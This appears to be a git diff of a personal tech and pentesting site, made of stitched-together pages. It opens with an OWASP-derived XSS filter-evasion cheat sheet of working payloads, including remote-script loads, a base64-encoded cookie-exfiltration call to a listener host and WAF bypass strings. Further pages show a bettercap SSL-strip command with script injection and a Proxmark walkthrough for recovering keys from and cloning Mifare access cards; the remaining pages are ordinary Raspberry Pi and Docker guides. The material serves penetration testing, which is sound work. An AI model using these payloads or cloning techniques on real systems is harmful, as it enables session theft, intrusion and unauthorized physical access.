XSS Using HTML Quote Encapsulation This was tested in IE, your mileage may vary. For performing XSS on sites that allow <SCRIPT>
but don't allow <SCRIPT SRC...
by way of a regex filter /\<script\[^\>\]+src/i
:
< script a = ">" src = "httx://xss.rocks/xss.js" ></ script >
+
For performing XSS on sites that allow <SCRIPT>
but don't allow \<script src...
by way of a regex filter /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
(this is an important one, because I've seen this regex in the wild):
< script =" > " src=" httx : //xss.rocks/xss.js"> </ script >
+
Another XSS to evade the same filter, /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
:
< SCRIPT a = ">" '' SRC = "httx://xss.rocks/xss.js" ></ SCRIPT >
+
Yet another XSS to evade the same filter, /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
. I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT>
tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT>
tags):
< SCRIPT " a = '>' " SRC = "httx://xss.rocks/xss.js" ></ SCRIPT >
+
And one last XSS attack to evade, /\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
using grave accents (again, doesn't work in Firefox):
< script a = "`" >
+ ` SRC="httx://xss.rocks/xss.js">
+</ script >
+
Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:
< script a = ">'>" src = "httx://xss.rocks/xss.js" ></ script >
+
This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:
< SCRIPT > document . write ( "<SCRI" );</ SCRIPT > PT SRC="httx://xss.rocks/xss.js"></ SCRIPT >
+
URL String Evasion Assuming http://www.google.com/
is programmatically disallowed:
IP Versus Hostname < a href = "http://66.102.7.147/" > XSS</ a >
+
URL Encoding < a href = "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D" > XSS</ a >
+
DWORD Encoding Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details:
< a href = "http://1113982867/" > XSS</ a >
+
Hex Encoding The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):
< a href = "http://0x42.0x0000066.0x7.0x93/" > XSS</ a >
+
Octal Encoding Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
< a href = "http://0102.0146.0007.00000223/" > XSS</ a >
+
Base64 Encoding < img onload = "eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))" />
+
Mixed Encoding Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:
< a
+ href = "h
+tt p://6 6.000146.0x7.147/"
+ > XSS</ a
+>
+
Protocol Resolution Bypass //
translates to http://
which saves a few more bytes. This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like (ht|f)tp(s)?://
(thanks to Ozh for part of this one). You can also change the //
to \\\\
. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.
< a href = "//www.google.com/" > XSS</ a >
+
Google "feeling lucky" part 1 Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's keyword:
protocol. You can concatenate several keywords by using something like the following keyword:XSS+RSnake
for instance. This no longer works within Firefox as of 2.0.
< a href = "//google" > XSS</ a >
+
Google "feeling lucky" part 2 This uses a very tiny trick that appears to work Firefox only, because of it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:
< a href = "http://ha.ckers.org@google" > XSS</ a >
+
Google "feeling lucky" part 3 This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):
< a href = "http://google:ha.ckers.org" > XSS</ a >
+
Removing CNAMEs When combined with the above URL, removing www.
will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):
< a href = "http://google.com/" > XSS</ a >
+
Extra dot for absolute DNS:
< a href = "http://www.google.com./" > XSS</ a >
+
JavaScript Link Location < a href = "javascript:document.location='http://www.google.com/'" > XSS</ a >
+
Content Replace as Attack Vector Assuming http://www.google.com/
is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (here is an example) to help create the attack vector (IE: java&\#x09;script:
was converted into java script:
, which renders in IE, Netscape 8.1+ in secure site mode and Opera):
< a href = "http://www.google.com/ogle.com/" > XSS</ a >
+
Assisting XSS with HTTP Parameter Pollution Assume a content sharing flow on a web site is implemented as below. There is a "Content" page which includes some content provided by users and this page also includes a link to "Share" page which enables a user choose their favorite social sharing platform to share it on. Developers HTML encoded the "title" parameter in the "Content" page to prevent against XSS but for some reasons they didn't URL encoded this parameter to prevent from HTTP Parameter Pollution. Finally they decide that since content_type's value is a constant and will always be integer, they didn't encode or validate the content_type in the "Share" page.
Content Page Source Code `a href="/Share?content_type=1& title=< %=Encode.forHtmlAttribute(untrusted content title)%>">Share</ a >
+
Share Page Source Code < script >
+ var contentType = <%= Request . getParameter ( "content_type" ) %> ;
+ var title = "<%=Encode.forJavaScript(request.getParameter(" title "))%>" ;
+ ...
+ //some user agreement and sending to server logic might be here
+ ...
+</ script >
+
Content Page Output In this case if attacker set untrusted content title as “This is a regular title&content_type=1;alert(1)†the link in "Content" page would be this:
< a href = "/share?content_type=1&title=This is a regular title&content_type=1;alert(1)" > Share</ a >
+
Share Page Output And in share page output could be this:
< script >
+ var contentType = 1 ; alert ( 1 );
+ var title = "This is a regular title" ;
+ …
+ //some user agreement and sending to server logic might be here
+ …
+</ script >
+
As a result, in this example the main flaw is trusting the content_type in the "Share" page without proper encoding or validation. HTTP Parameter Pollution could increase impact of the XSS flaw by promoting it from a reflected XSS to a stored XSS.
Character Escape Sequences All the possible combinations of the character "\<" in HTML and JavaScript. Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above.
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
Methods to Bypass WAF – Cross-Site Scripting Stored XSS If an attacker managed to push XSS through the filter, WAF wouldn’t be able to prevent the attack conduction.
Reflected XSS in Javascript Example: <script> ... setTimeout(\\"writetitle()\\",$\_GET\[xss\]) ... </script>
+Exploitation: /?xss=500); alert(document.cookie);//
+
DOM-based XSS Example: <script> ... eval($\_GET\[xss\]); ... </script>
+Exploitation: /?xss=document.cookie
+
XSS via request Redirection ...
+header('Location: '.$_GET['param']);
+...
+
As well as:
..
+header('Refresh: 0; URL='.$_GET['param']);
+...
+
This request will not pass through the WAF: /?param=<javascript:alert(document.cookie>)
This request will pass through the WAF and an XSS attack will be conducted in certain browsers. /?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
WAF ByPass Strings for XSS <Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>â€>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over​ <img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript:alert(1)>CLICKME
<input/onmouseover="javaSCRIPT:confirm(1)"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
Filter Bypass Alert Obfuscation (alert)(1)
a=alert,a(1)
[1].find(alert)
top[“alâ€+â€ertâ€](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
alert?.()
`${alert``}
` (The payload should include leading and trailing backticks.) (alert())
source: OWASP / www-community
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/bettercap1.6.2/index.html b/penetration-testing/kali-linux/bettercap1.6.2/index.html
new file mode 100644
index 000000000..ca4956cd9
--- /dev/null
+++ b/penetration-testing/kali-linux/bettercap1.6.2/index.html
@@ -0,0 +1,175 @@
+ Bettercap 1.6.2 Installation - 3os penetration-testing tools Authors: fire1ce | Created: 2021-10-24 | Last update: 2022-08-02 Bettercap 1.6.2 Installation Bettercap 1.6.2 Installation BetterCAP is a powerful, flexible, and portable tool created to perform various types of MITM attacks against a network
Bettercap 1.6.2 is legacy tool, but it performs ssl strip much better then Bettercap 2.x
Install Ruby Gem
apt install -y ruby-full libpcap-dev
+gem update --system
+gem install bettercap
+
Bettercap 1.6.2 installs the executable to /usr/local/bin/bettercap
Bettercap 2.x installs the executable to /usr/bin/bettercap
Both Bettercap 1.6.2 and 2.x shares the same executable name. In order to privet any collisions we will rename the Bettercap 1.6.2 executable to bettercap1.6.2
.
mv /usr/local/bin/bettercap /usr/local/bin/bettercap1.6.2
+
From this point you can run bettercap1.6.2 for Bettercap 1.6.2
and bettercap for Bettercap 2.x
Bettercap 1.6.2 SSL Strip Examples Basic SSL Strip Example
bettercap1.6.2 -X -T 192 .168.1.104 --proxy
+
SSL Strip With XSS Example
bettercap1.6.2 -X -T 192 .168.3.104 --proxy --proxy-module injectjs --js-data "<script>alert('SSL STRIP, Script Injection')</script>"
+
Dbug To find that Bettercap installation from ruby gems:
the path should be under GEM PATHP for example:
/var/lib/gems/2.7.0/gems/bettercap-1.6.2
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/kali-linux/index.html b/penetration-testing/kali-linux/kali-linux/index.html
new file mode 100644
index 000000000..a075a5b48
--- /dev/null
+++ b/penetration-testing/kali-linux/kali-linux/index.html
@@ -0,0 +1,195 @@
+ Kali Linux - 3os penetration-testing kali-linux kali Kali Linux Minimal Headless Kali Linux installation - Works for Cloud VM Installation (NO GUI) This is a simple guide to install Minimal Headless Kali Linux by converting a Debian Linux to Kali Linux distro without any unnecessary tools. Basically you install the tools you need.
Platforms Minimum Monthly Price DigitalOcean.com 5$ (This link provides 100$ for 60 days)
First of all we will need a clean Debian Linux local or at any cloud provider with ssh access
Let's convert! We will install two packages which allow as to replace Debian's repo to kali repo
apt install -y gnupg gnupg2 wget
+
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
+
rm -rf /etc/apt/sources.list
+
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
+
Now after we replaced the repo to Kali we need to install the Basic Kali Linux core
apt-cache search kali-linux
+
apt install -y kali-linux-core
+
apt-get -y dist-upgrade
+
Reboot the server to complete the conversion process.
In order to test that you are using Kali Linux
Or you can check the contents of the /etc/os-release
file for this Debian distribution. After we got our new Minimal Kali ready we need to cleanup some Debian's leftovers to finnish
systemctl stop rpcbind.socket rpcbind smbd
+
systemctl disable rpcbind.socket rpcbind smbd
+
That's It, now we can install any package we need from Kali repo.
Here are some of my personal packages I use daily
apt update && apt install -y \
+curl wget git dnsutils whois net-tools htop locate telnet traceroute \
+dirb wfuzz dirbuster enum4linux gobuster nbtscan nikto nmap \
+onesixtyone oscanner smbclient fern-wifi-cracker crowbar smbmap \
+smtp-user-enum sslscan tnscmd10g whatweb snmpcheck wkhtmltopdf \
+sipvicious seclists wordlists hydra bully netcat-openbsd netcat-traditional \
+adb fastboot realtek-rtl88xxau-dkms docker docker-compose crunch \
+wifite apktool apksigner zipalign default-jre default-jdk man-db \
+screenfetch xsltproc binwalk python3-pip zlib1g-dev python2.7-dev \
+subfinder chrony hcxtools libssl-dev hcxdumptool hashcat hash-identifier \
+libpcap-dev npm sqlmap wpscan exploitdb minicom screen hashid nfs-common
+
Fix SSH Broken Pipe in Kali add this:
Host *
+ IPQoS = throughput
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/links/index.html b/penetration-testing/kali-linux/links/index.html
new file mode 100644
index 000000000..69fb9edb0
--- /dev/null
+++ b/penetration-testing/kali-linux/links/index.html
@@ -0,0 +1,167 @@
+ Links and Tools - 3os pt tools Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-07-17 Links Description Eicar Files Files With Virus Signature Credit Card Generator PayPal Credit Card Generator - Login Required ipleak.net Displays Information About Your IP mxtoolbox Network Tools Related to DNS jwt.io Allows You to Decode, Verify and Generate Json Web Tokens DNS Dumpster Domain Research Tool That Can Discover Hosts Related to a Domain SSL-Lab Deep Analysis of The Configuration of any SSL Web Server GraphQLmap Engine to interact with a graphqlr endpoint for penetration-testing purposes.
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/metasploit/index.html b/penetration-testing/kali-linux/metasploit/index.html
new file mode 100644
index 000000000..185caf098
--- /dev/null
+++ b/penetration-testing/kali-linux/metasploit/index.html
@@ -0,0 +1,172 @@
+ Metasploit Framework - 3os pt tools metasploit Authors: fire1ce | Created: 2021-10-24 | Last update: 2022-08-02 Installation apt install -y metasploit-framework postgresql
+
systemctl enable postgresql
+
systemctl start postgresql
+
Start:
Back to top
\ No newline at end of file
diff --git a/penetration-testing/kali-linux/wifite/index.html b/penetration-testing/kali-linux/wifite/index.html
new file mode 100644
index 000000000..1700aefad
--- /dev/null
+++ b/penetration-testing/kali-linux/wifite/index.html
@@ -0,0 +1,177 @@
+ Wifite - 3os pt tools wifi Authors: fire1ce | Created: 2021-10-24 | Last update: 2022-08-02 Wifite Wifite is an automated wireless attack tool.
Wifite2 Github page
In order to perform wifi attacks you need a wifi card with Monitor Mode
and Frame Injection
like Realtek rtl8812au chipset.
Suggested Wifi Dongles
Install in kali Install Pyrit for Wifite Pyrit Github page
Install dependencies
apt install python zlib openssl git
+
The Install
cd ~
+git clone https://github.com/JPaulMora/Pyrit.git;
+pip install psycopg2 scapy;
+cd Pyrit
+python setup.py clean;
+python setup.py build;
+python setup.py install;
+rm -rf ~/Pyrit
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/proxmark/about-proxmark/index.html b/penetration-testing/proxmark/about-proxmark/index.html
new file mode 100644
index 000000000..6c84979c7
--- /dev/null
+++ b/penetration-testing/proxmark/about-proxmark/index.html
@@ -0,0 +1,167 @@
+ About Proxmark3 - 3os pt tools rfid Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-11-16 About Proxmark3 The Proxmark is an RFID swiss-army tool, allowing for both high and low level interactions with the vast majority of RFID tags and systems world-wide.
There are few Promark Devices, and you can find them at the offical website. I personally use the device at the picture above, you can get one at
it's cheap and suites my needs
The RFID tags i use are duel band tags 13.56Mhz and 125KHz
Useful Links:
Back to top
\ No newline at end of file
diff --git a/penetration-testing/proxmark/cheatsheet/index.html b/penetration-testing/proxmark/cheatsheet/index.html
new file mode 100644
index 000000000..c8684c754
--- /dev/null
+++ b/penetration-testing/proxmark/cheatsheet/index.html
@@ -0,0 +1,167 @@
+ Proxmark3 CheatSheet - 3os pt tools rfid Authors: fire1ce | Created: 2021-09-12 | Last update: 2022-08-02 Proxmark3 CheatSheet Basics Command Description hf search Identify High Frequency cards lf search Identify Low Frequency cards hw tune Measure antenna characteristics, LF/HF voltage should be around 20-45+ V hw version Check version hw status Check overall status
Back to top
\ No newline at end of file
diff --git a/penetration-testing/proxmark/mifare-tags/index.html b/penetration-testing/proxmark/mifare-tags/index.html
new file mode 100644
index 000000000..567deb218
--- /dev/null
+++ b/penetration-testing/proxmark/mifare-tags/index.html
@@ -0,0 +1,222 @@
+ Mifare Classic 1K ISO14443A - 3os pt tools rfid Authors: fire1ce | Created: 2023-06-20 | Last update: 2023-06-20 Clone Mifare Classic 1K ISO14443A Which results in a response along the lines of:
#db# DownloadFPGA(len: 42096)
+ UID : de 0f 3d cd
+ATQA : 00 04
+ SAK : 08 [ 2 ]
+TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
+proprietary non iso14443-4 card found, RATS not supported
+No chinese magic backdoor command detected
+Prng detection: HARDENED ( hardnested)
+Valid ISO14443A Tag Found - Quiting Search
+
As we can see the output ISO14443A Tag Found
it's Mifare 1k
card.
This also shows us the UID de0f3dcd
of the card, which we’ll need later.
Find and Extract the 32 Keys From The Mifare ISO14443A From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used)
proxmark3> hf mf chk * ?
+
This should show us the key we require looking something like
No key specified, trying default keys
+chk default key[ 0 ] ffffffffffff
+chk default key[ 1 ] 000000000000
+chk default key[ 2 ] a0a1a2a3a4a5
+chk default key[ 3 ] b0b1b2b3b4b5
+chk default key[ 4 ] aabbccddeeff
+chk default key[ 5 ] 4d3a99c351dd
+chk default key[ 6 ] 1a982c7e459a
+chk default key[ 7 ] d3f7d3f7d3f7
+chk default key[ 8 ] 714c5c886e97
+chk default key[ 9 ] 587ee5f9350f
+chk default key[ 10 ] a0478cc39091
+chk default key[ 11 ] 533cb6c723f6
+chk default key[ 12 ] 8fd0a4f256e9
+--sector: 0 , block: 3 , key type:A, key count:13
+Found valid key:[ ffffffffffff]
+ ...omitted for brevity...
+--sector:15, block: 63 , key type:B, key count:13
+Found valid key:[ ffffffffffff]
+
If you see Found valid key :[ffffffffffff]
This shows a key of ffffffffffff
, which we can plug into the next command, which dumps keys to file dumpkeys.bin
.
proxmark3> hf mf nested 1 0 A ffffffffffff d
+
If you see see an a table like this in output without valid key
| ---| ----------------| ---| ----------------| ---|
+| sec| key A | res| key B | res|
+| ---| ----------------| ---| ----------------| ---|
+| 000 | a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
+| 001 | ffffffffffff | 0 | ffffffffffff | 0 |
+| 002 | a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
+| 003 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 004 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 005 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 006 | ffffffffffff | 1 | ffffffffffff | 0 |
+| 007 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 008 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 009 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 010 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 011 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 012 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 013 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 014 | ffffffffffff | 1 | ffffffffffff | 1 |
+| 015 | ffffffffffff | 1 | ffffffffffff | 1 |
+| ---| ----------------| ---| ----------------| ---|
+
In this case use 002
key like this
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d
+
Now you should be able to dump the contents of the 32 keys from the original card. This dumps data from the card into dumpdata.bin
Clone Mifare ISO14443A Using The Dumped Keys At this point we’ve got everything we need from the card, we can take it off the reader.
To copy that data onto a new card, place the (Chinese backdoor) card on the Proxmark .
This restores the dumped data onto the new card. Now we just need to give the card the UID we got from the original hf search command
proxmark3> hf mf restore 1
+
Copy the UID of the original card de0f3dcd
proxmark3> hf mf csetuid de0f3dcd
+
We’re done.
Back to top
\ No newline at end of file
diff --git a/penetration-testing/utilities/clickjacking/index.html b/penetration-testing/utilities/clickjacking/index.html
new file mode 100644
index 000000000..647778ec2
--- /dev/null
+++ b/penetration-testing/utilities/clickjacking/index.html
@@ -0,0 +1,167 @@
+ Clickjacking Test Page - 3os
\ No newline at end of file
diff --git a/penetration-testing/utilities/idd-generator/index.html b/penetration-testing/utilities/idd-generator/index.html
new file mode 100644
index 000000000..50ceab955
--- /dev/null
+++ b/penetration-testing/utilities/idd-generator/index.html
@@ -0,0 +1,167 @@
+ IID Generator & Validator - 3os pt tools IID Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 IID Generator & Validator
Description This is a simple Java Script tool to validate or generate a random Israel's ID number.
Credit & Sources The code was built by Georgy Bunin and cloned from his repository . It was slightly modified to fit this website.
Back to top
\ No newline at end of file
diff --git a/psd-src/3os-preview.png b/psd-src/3os-preview.png
new file mode 100644
index 000000000..a30ee7634
Binary files /dev/null and b/psd-src/3os-preview.png differ
diff --git a/psd-src/3os-preview.psd b/psd-src/3os-preview.psd
new file mode 100644
index 000000000..068e48695
Binary files /dev/null and b/psd-src/3os-preview.psd differ
diff --git a/psd-src/3os-preview_v2.psd b/psd-src/3os-preview_v2.psd
new file mode 100644
index 000000000..94dd41344
Binary files /dev/null and b/psd-src/3os-preview_v2.psd differ
diff --git a/raspberry-pi/docker-raspberrypi/index.html b/raspberry-pi/docker-raspberrypi/index.html
new file mode 100644
index 000000000..fc77ff96a
--- /dev/null
+++ b/raspberry-pi/docker-raspberrypi/index.html
@@ -0,0 +1,173 @@
+ Docker on Raspberry Pi - 3os docker raspberry-pi docker-compose Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-24 Docker and Docker-compose on Raspberry Pi How to install docker on Raspberry Pi sudo apt install -y docker.io
+
Runing Docker as root sudo usermod -aG docker pi
+
Manage Docker as a non-root user The Docker daemon binds to a Unix socket instead of a TCP port. By default that Unix socket is owned by the user root and other users can only access it using sudo. The Docker daemon always runs as the root user.
If you don’t want to preface the docker command with sudo, create a Unix group called docker and add users to it. When the Docker daemon starts, it creates a Unix socket accessible by members of the docker group.
The docker group grants privileges equivalent to the root user.
sudo groupadd docker
+sudo usermod -aG docker $USER
+newgrp docker
+
How to install docker-compose on Raspberry Pi sudo apt install docker-compose
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/external-power-button/index.html b/raspberry-pi/external-power-button/index.html
new file mode 100644
index 000000000..faddb14d9
--- /dev/null
+++ b/raspberry-pi/external-power-button/index.html
@@ -0,0 +1,171 @@
+ External Power Button - 3os raspberry-pi Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-04-24 Python script to control Raspberry Pi with external power button - Wake/Power Off/Restart(Double Press)
Official Github Repo
When Raspberry Pi is powered off, shortening GPIO3 (Pin 5) to ground will wake the Raspberry Pi.
This script uses pin GPIO3(5), Ground(6) with momentary button.
Requirements Can be install via apt
sudo apt install python3-gpiozero
+
Install This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/install.sh | bash
+
Uninstall curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-power-button/main/uninstall.sh | bash
+
Default Behavior Button Press (Raspberry Pi is ON) Behavior Single Nothing Double Reboot Long press and releases (above 3 seconds) Power off
Button Press (Raspberry Pi is OFF) Behavior Single Power On
Check if service is running sudo systemctl status power_button.service
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/guides/3g-modem-host/index.html b/raspberry-pi/guides/3g-modem-host/index.html
new file mode 100644
index 000000000..78fbb362a
--- /dev/null
+++ b/raspberry-pi/guides/3g-modem-host/index.html
@@ -0,0 +1,214 @@
+ 3g Modem Host Configuration - 3os raspberry-pi 3g-modem Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 3g Modem Host Configuration Install ubuntu server for raspberrypi using Raspberry Pi Imager {}
Packages Installation apt install -y ppp curl wget git dnsutils whois net-tools htop gcc libusb-1.0-0-dev iptables-persistent isc-dhcp-server
+
After the install add a symlink
ln -s /usr/include/libusb-1.0/libusb.h /usr/include/libusb.h
+
sakis3g Script Installation Clone, Compile, and copy to /usr/bin/
git clone https://github.com/Trixarian/sakis3g-source.git
+cd sakis3g-source
+./compile
+cp build/sakis3gz /usr/bin/sakis3g
+
Create new script for auto connect
nano /usr/bin/sakis3gConnect.sh
+
interactive connect (for testing) bash sakis3g --interactive
Copy the following
#!/bin/bash
+
+/usr/bin/sakis3g start USBINTERFACE = "5" APN = "vob3g" APN_USER = " " APN_PASS = " "
+
When APN credentials are epmpy, APN_USER and APN_PASS should be a string with a space
Add executable permissions
chmod +x sakis3gConnect.sh
+
Run the script sakis3gConnect.sh
You should have a new interface ppp0
Configuring DHCP Server !! info The following configuration assumes use of eth0 interface for the DHCP
Edit
nano /etc/default/isc-dhcp-server
+
Add the following to the end of the config
INTERFACESv4 = "eth0"
+INTERFACESv6 = "eth0"
+
Edit
nano /etc/dhcp/dhcpd.conf
+
Change the following options to (you can choose the name servers you use):
option domain-name "local" ;
+option domain-name-servers 8 .8.8.8;
+default-lease-time 600 ;
+max-lease-time 7200 ;
+ddns-update-style none;
+authoritative;
+
Append the DHCP Network config to the end of the file (Change for your need):
subnet 192 .168.20.0 netmask 255 .255.255.0 {
+ range 192 .168.20.5 192 .168.20.30;
+ option routers 192 .168.20.1;
+ option domain-name-servers 8 .8.8.8, 8 .8.4.4;
+}
+
Save & Exit
run
echo 1 > /proc/sys/net/ipv4/ip_forward
+
Edit
Change the following option
Restart and Test
service isc-dhcp-server restart
+service isc-dhcp-server status
+
edit:
/etc/netplan/50-cloud-init.yaml
+
network:
+ ethernets:
+ eth0:
+ addresses: [ 192 .168.20.1/24]
+ gateway4: 192 .168.20.1
+ nameservers:
+ addresses: [ 1 .1.1.1, 8 .8.8.8]
+ version: 2
+
After reboot you should connet to the new static ip
Lets route all the trafic to new interface with Iptables iptables -F
+iptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE
+iptables --append FORWARD --in-interface eth0 -j ACCEPT
+
Save the rules
iptables-save > /etc/iptables/rules.v4
+ip6tables-save > /etc/iptables/rules.v6
+
Cron examples @reboot sleep 20 && /usr/bin/sakis3gConnect.sh
+*/5 * * * * /usr/bin/sakis3gConnect.sh
+
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/motion-sensor-display-control/index.html b/raspberry-pi/motion-sensor-display-control/index.html
new file mode 100644
index 000000000..ada33acc1
--- /dev/null
+++ b/raspberry-pi/motion-sensor-display-control/index.html
@@ -0,0 +1,177 @@
+ Motion Sensor Display Control - 3os raspberry-pi motion-sensor automation Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-07-13 Motion Sensor Display Control Python script to control connected display to Raspberry Pi using Motion Sensor (pir).
Official Github Repo
This script uses pin GPIO4(7) to read data from Motion (PIR) Sensor, Any 5v and ground for PIR Sensor
Requirements Can be install via apt
sudo apt install python3-gpiozero
+
Install This will install the script as service
and it will run at boot
curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/install.sh | bash
+
Uninstall curl https://raw.githubusercontent.com/fire1ce/raspberry-pi-pir-motion-display-control/main/uninstall.sh | bash
+
Default Behavior Condition Behavior Motion while display is off Turns on display for 60 sec Motion while display is on Resets the timer for another 60 sec No motion > 60 sec Turns off the display
Config File
/usr/local/bin/motion-display-control.py
+
You can change Data Pin of the PIR Sensor at gpio_pin value You can change Delay at display_delay value
Line
motion = Motion ( gpio_pin = 4 , display_delay = 60 , verbose = False )
+
Restart the service to apply changes
sudo systemctl restart power_button.service
+
Debug In order to allow verbose debug change the following
File
/usr/local/bin/motion-display-control.py
+
Line
Set verbose value to True
motion = Motion ( gpio_pin = 4 , display_delay = 60 , verbose = True )
+
Restart the service to apply changes
sudo systemctl restart motion-display-control.service
+
Check if service is running sudo systemctl status motion-display-control.service
+
Contributors Thanks to Boris Berman for the script rewrite from function to classes
Back to top
\ No newline at end of file
diff --git a/raspberry-pi/projects/magic-mirror-v2/index.html b/raspberry-pi/projects/magic-mirror-v2/index.html
new file mode 100644
index 000000000..ed78eb0fc
--- /dev/null
+++ b/raspberry-pi/projects/magic-mirror-v2/index.html
@@ -0,0 +1,199 @@
+ Magic Mirror 2.0 - 3os raspberry-pi magicmirror Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-07-13 Magic Mirror 2.0
To be honest, it's not my first time building a Magic Mirror project. My first magicmirror can be found here . The Magic Mirror 2.0 is based on Raspberry Pi 4 with Docker Container.
References magicmirror.builders official website. khassel's magicmirror docker image documentation website.
The Build Process I had dead iMac 2011 27" with 2k display. I've managed to use it's LCD panel with this product from AliExpress. It actually a full controller for the specific LCD panel, including the inverter for backlight. Basically, it's a full-fledged LCD Monitor with HDMI we need for the Raspberry Pi 4 .
